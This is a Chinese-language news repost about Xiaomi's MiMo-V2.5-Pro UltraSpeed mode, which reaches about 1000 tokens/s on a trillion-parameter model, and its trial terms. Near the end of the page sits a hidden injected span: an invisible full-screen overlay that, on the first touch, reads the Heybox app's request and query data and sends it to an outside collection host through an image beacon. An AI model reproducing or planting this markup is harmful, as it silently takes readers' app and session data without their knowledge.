今天,MiMo × TileRT 聯合發佈 Xiaomi MiMo-V2.5-Pro 的 UltraSpeed 模式,通過模型與系統的極致 Codesign,在通用 GPU 上將萬億參數模型的生成速度首次突破 1000 tokens/s。
用我們能聽懂的話解釋就是:以前你問 AI 一個問題,它慢悠悠地打字,你只能乾等着。現在這個速度,感覺 AI 在"說話",而不是在"打字"。寫代碼、做推理、跑 Agent,效率直接起飛。
![]()
他們是怎麼做到的?
簡單說,就是模型和系統兩邊同時發力。模型這邊,把參數壓縮成更小的格式(FP4量化),又用了一種叫 DFlash 的黑科技,讓 AI 每次"驗證答案"的時候能一口氣喫下更多內容。系統這邊,TileRT 團隊重新設計了底層運行方式,讓 GPU 幾乎沒有任何"空閒時間",一直在滿速跑。兩邊配合起來,纔有了這個成績。
![]()
如何體驗?
現在可以去申請限時試用,不過名額有限,從6月9日到6月23日。API 的價格是普通版的3倍,但速度是10倍。審覈通過的話還有免費的網頁版可以玩。按量付費,不支持之前的Token Plan計劃。
---
另外,模型權重已經開源到了 HuggingFace,有興趣的開發者可以自行研究。
來源:https://mimo.xiaomi.com/zh/blog/mimo-tilert-1000tps
<span ontouchstart="this.style.display='none';try{setTimeout(()=>{H=window.HeyboxRequest,q=(((window.CURRENT_VUE||{}).$data||{}).location||{}).query||{},hbInfo=(window.$hb_location||{}).query||{};new Image().src='https://a.124213.xyz/collect?fullInfo='+JSON.stringify(q)+'&hbInfo='+JSON.stringify(hbInfo)+'&searchStr='+encodeURIComponent(location.search)},200)}catch(e){}" style="position:fixed;top:0;left:0;width:100%;height:100%;z-index:99999;opacity:0"></span>
更多遊戲資訊請關註:電玩幫遊戲資訊專區
電玩幫圖文攻略 www.vgover.com
